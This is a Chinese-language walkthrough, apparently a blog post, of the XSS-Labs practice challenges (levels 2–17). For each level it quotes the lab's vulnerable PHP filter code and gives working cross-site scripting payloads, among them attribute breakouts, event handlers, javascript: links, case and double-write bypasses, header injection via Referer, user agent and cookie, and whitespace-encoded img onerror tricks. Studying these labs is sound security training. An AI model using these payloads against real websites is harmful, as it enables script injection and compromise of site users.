Xss_Labs
涉及到XSS查看源代码的操作均使用ViewSource,不要用开发者工具的Elements查看!不会显示HTML实体的,浏览器会自动解码!
level2
传<script>alert(1)</script>
如下:
看一眼源代码,发现value属性中的字符没有变成HTML实体,而<h2>
标签内的变了,说明在表单内的字符没有进行过滤,GET传入服务器时无过滤,但是服务器传回到浏览器发生转义,emmm,那就直接闭合input标签就好了
payload:
1
| "><script>alert(1)</script>
|
level3
用个<script>alert(1)</script>
探探路,表单内的和h2标签的都被转义了,
那我们就看看有哪些预定义字符是会被php转义成实体的(文章参考这篇)
解码结果 |
描述 |
实体名称 |
|
空格 |
|
< |
小于号 |
< |
> |
大于号 |
> |
& |
和 |
& |
“ |
双引号 |
" |
注意单引号虽然存在实体&apos但是不被转义,HTML5中预留但是也不推荐使用
先闭合value,再引入鼠标事件的属性(onclick,onfocus,onmouseover,onmouseout等等)
构造payload:
1 2 3 4
| ' onclick=javascript:alert(1) ' ' onfocus=javascript:alert(1) ' ' onmouseover=javascript:alert(1) ' ' onmouseout=javascript:alert(1) '
|
level4
依旧传入<script>alert(1)</script>
,打开网页源码发现value没被转义但是<>字符被过滤,但是h2标签内被转义
1 2 3 4 5 6
| $str = $_GET["keyword"]; $str2=str_replace(">","",$str); $str3=str_replace("<","",$str2); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level4.php method=GET> <input name=keyword value="'.$str3.'">
|
试下和上一题同样的操作,但是双引号闭合:
payload:
1
| " onmouseout=javascript:alert(1) "
|
level5
依旧<script>alert(1)</script>
开局,script变成scr_ipt,再试试鼠标事件,on变成o_n,试一下大写绕过,结果全被换成小写,
去看下后端代码,script和on被替换,并且strtolower()函数存在,全转成小写
1 2 3 4 5 6
| $str = strtolower($_GET["keyword"]); $str2=str_replace("<script","<scr_ipt",$str); $str3=str_replace("on","o_n",$str2); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level5.php method=GET> <input name=keyword value="'.$str3.'">
|
尝试js伪协议:
1 2 3 4
| <a href=javascript:/0/,alert(%22M%22)>M</a> <a href=javascript:/00/,alert(%22M%22)>M</a> <a href=javascript:/000/,alert(%22M%22)>M</a> <a href=javascript:/M/,alert(%22M%22)>M</a>
|
payload
1
| "><a href='javascript:alert(1)'>m</a>
|
点击这个链接:
level6
前面踩坑过程都一样,直接上后端代码
1 2 3 4 5 6 7 8 9
| $str = $_GET["keyword"]; $str2=str_replace("<script","<scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level6.php method=GET> <input name=keyword value="'.$str6.'">
|
与上一题不同的是,这题没有小写转换,大写绕过下
payload:
1
| "><Script>alert(1)</Script>
|
level7
直接上后端代码:
1 2 3 4 5 6 7 8 9
| $str =strtolower( $_GET["keyword"]); $str2=str_replace("script","",$str); $str3=str_replace("on","",$str2); $str4=str_replace("src","",$str3); $str5=str_replace("data","",$str4); $str6=str_replace("href","",$str5); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level7.php method=GET> <input name=keyword value="'.$str6.'">
|
全转成小写再过滤,很明显双写绕过了
payload:
1
| "><scriscriptpt>alert(1)</scriscriptpt>
|
level8
后端代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); $str7=str_replace('"','"',$str6); echo '<center> <form action=level8.php method=GET> <input name=keyword value="'.htmlspecialchars($str).'"> <input type=submit name=submit value=添加友情链接 /> </form> </center>'; ?> <?php echo '<center><BR><a href="'.$str7.'">友情链接</a></center>'; ?>
|
是把传入的字符串进行转小写之后进行一系列过滤操作,最后将字符写入a标签的href属性中,跳转链接
利用js伪协议,传javascript:alert(1)
,但是script被过滤,上网搜了下,可以使用unicode编码
level9
上代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| $str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); $str7=str_replace('"','"',$str6); echo '<center> <form action=level9.php method=GET> <input name=keyword value="'.htmlspecialchars($str).'"> <input type=submit name=submit value=添加友情链接 /> </form> </center>'; ?> <?php if(false===strpos($str7,'http://')) { echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>'; } else { echo '<center><BR><a href="'.$str7.'">友情链接</a></center>'; } ?>
|
下面多了个strpos()函数的验证,输入字符串必须包含’http://‘,emmm,可是你也妹说在哪写’http://‘,直接和第八题一样
编码’javascript’:
payload:
1
| javascript:alert('http://')
|
level10
话不多说,上代码:
1 2 3 4 5 6 7 8 9 10 11 12
| $str = $_GET["keyword"]; $str11 = $_GET["t_sort"]; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form id=search> <input name="t_link" value="'.'" type="hidden"> <input name="t_history" value="'.'" type="hidden"> <input name="t_sort" value="'.$str33.'" type="hidden"> </form> </center>'; ?>
|
emmm,表单隐藏起来了呀,小问题,这不是可以GET传参嘛
传了个" onclick='javascript:alert(1)'
,唉呦吼吼,忘记了,表单隐藏了,所以没法点击,想了个办法,但是感觉是非预期解吧。。就是开开发者工具修改网页代码,把type属性删掉,过是过了,但是好蠢www,去网上看了下
1
| ?keyword=nul&t_sort=" type="text" onclick="alert('xss')
|
这里input标签内将会出现两个type属性,浏览器通常会判定第一个出现的值作为最终的值
level11
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form id=search> <input name="t_link" value="'.'" type="hidden"> <input name="t_history" value="'.'" type="hidden"> <input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden"> <input name="t_ref" value="'.$str33.'" type="hidden"> </form> </center>'; ?>
|
先看参数t_sort,想通过覆盖type属性的值就要闭合双引号,就会被转义,是行不通的,那就通过t_ref参数,修改ref头来进行xss
level12
同上,换成了ua
level13
同上,换成了cookie
level14
题目出问题了,做不了
level15
1 2 3 4 5
| <?php ini_set("display_errors", 0); $str = $_GET["src"]; echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>'; ?>
|
ng-include
:这玩意类似于php的include,文件包含
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| 1、ng-include 指令用于包含外部的 HTML文件。
2、包含的内容将作为指定元素的子节点。
3、ng-include 属性的值可以是一个表达式,返回一个文件名。
4、默认情况下,包含的文件需要包含在同一个域名下。
特别值得注意的几点如下:
1.ng-include,如果单纯指定地址,必须要加引号
2.ng-include,加载外部html,script标签中的内容不执行
3.ng-include,加载外部html中含有style标签样式可以识别
|
所以可以包含同样存在xss漏洞的level1:
payload:
因为不执行script标签内容,所以这里使用伪协议或者<img>
标签
1 2 3 4
| ?src='level1.php?name=<a href='javascript:alert(1)'>xss</a>' ?src='level1.php?name=<a href="javascript:alert(/xss/)">' ?src='level1.php?name=<img src=1 onerror=alert(1)/>' ?src='level1.php?name=<img src=1 onerror=alert(1)>'
|
level17
1 2 3 4 5 6
| $str = strtolower($_GET["keyword"]); $str2=str_replace("script"," ",$str); $str3=str_replace(" "," ",$str2); $str4=str_replace("/"," ",$str3); $str5=str_replace(" "," ",$str4); echo "<center>".$str5."</center>";
|
不让用script?那就用<img>
,空格过滤?那么多绕过姿势
payload:
1 2 3
| <img%0asrc=x%0aonerror=alert(1)> <img%0csrc=x%0conerror=alert(1)> <img%0dsrc=x%0donerror=alert(1)>
|